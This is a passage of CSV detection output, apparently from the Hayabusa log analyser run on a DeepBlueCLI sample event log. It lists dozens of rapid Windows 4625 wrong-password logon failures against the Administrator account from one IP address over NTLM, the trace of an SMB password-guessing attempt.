192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.554 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22ZSltGNwIl0DNDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.595 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IYwG9IUpdk5DmM8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.644 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a8kbGxQFHDBodGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.685 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KoLqIaO8p3k9kOkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUnonSx3ZBdkyGhu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.772 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
d1QJziwKhsaJljGV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.807 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZhcNRrpODYB9jZxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.852 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yi5JE53caVn7n54w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.885 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jx6qTASzFp830ud6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4L8HtBWlmAMTjCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.966 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4hVfTwibHreepku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.012 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 3TlapK211UT8SO0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.059 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mzzw3uPkn2cgtmlF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.092 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aPnfUjwJei5E5BD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.133 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mm1k0eeKAYokIbDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.166 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w8TDNcJ3LMyNtUe1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogKKslkdXvc9f130 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: sgoy6gMfe5N0UiP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.289 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfjf3d6I8TsBOzvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vs8DG8s81oOwYoI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.427 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LFkgN1aDoYkQ4qrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.459 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KMwLokYpcFIYHegd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.507 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oKradBV4ERsQnKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.549 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 0qPzlzfmgrbYTKqQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKYlBm2lhobHzbjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.623 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBMu96oqO9tb3f4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.664 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO04Q3eYdzyuy51v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FrIa2UrSrfdhkDCx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.741 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axhhyMrGl95O16Vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.783 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atjvfi8QeEDluhL2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.827 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HPBZKUiiKeyQwSr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.872 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2SmitfyjO4mxqw5E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.904 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nrq1g8ktTQbPTXqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.947 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 943GV3t1muba5IQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.982 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPVd28zf85AxdGqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:17.023 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D6evoSSxcKkHspuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C4fznmrnIdUH7DzG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.099 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwrrYjUV41P0K5Jh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4RBZrALEnH5BKP9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.192 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LU6uWH4gs4iHP7rV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.237 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCfhZDAH8ufk77zN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TE9pw4UeRldGeKVc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.312 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8PKE05MqxE5TwXT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GIE5fmddOPBbCM3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.414 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pveyo4Czx6KWKCGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.453 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPyyHaRnBec7Qg2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.486 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3b8mudJp5mdkiEW | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Y6mjLaCzR28Q2qK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.563 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dMsNKWEjeCYYQVqw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.605 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7c5fENhkwO6QfEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cr1wAeMhPgVpwV82 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.692 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErpp9Ww6LO37C9k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
CYsNpBsGT5zOKe3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.866 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgzUk1Dmttm4AQ3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.921 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hp0c3YYyOSJuBHCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gkis4H1MIQPHUwqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.009 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lb6mH03qKLb8O7Dz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J10xEmhRNWfJ5FCI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.093 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 5Dujj8A7wwzAwzCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVDE3fIoUQfLn3cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.175 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UlD48O0XpFUnuSmo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.213 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KyTPKuspADmLpv0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BdIAPiH32ZbmCgTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dEiN2xOA4E9Wl5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.337 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: fBeAez2fLjXB0dk3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gQ45aeMDc3Snabvv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWSYdr4lJlhCLMMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.462 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgxHY7072aUCdfa0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.504 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9yKhEodJDTVCGdIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z0odyPQmvkGRNWZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.630 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: b5uRpG0fxCK75DPV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.666 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d9dcEzpJRW5YA8Bj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv3B9bwB1YIaBa6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.743 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJf9Obml4aVxE5zp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mvnSOaRSkGU6Uf5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.808 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JSAkZsZsv0SaLKaO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.847 
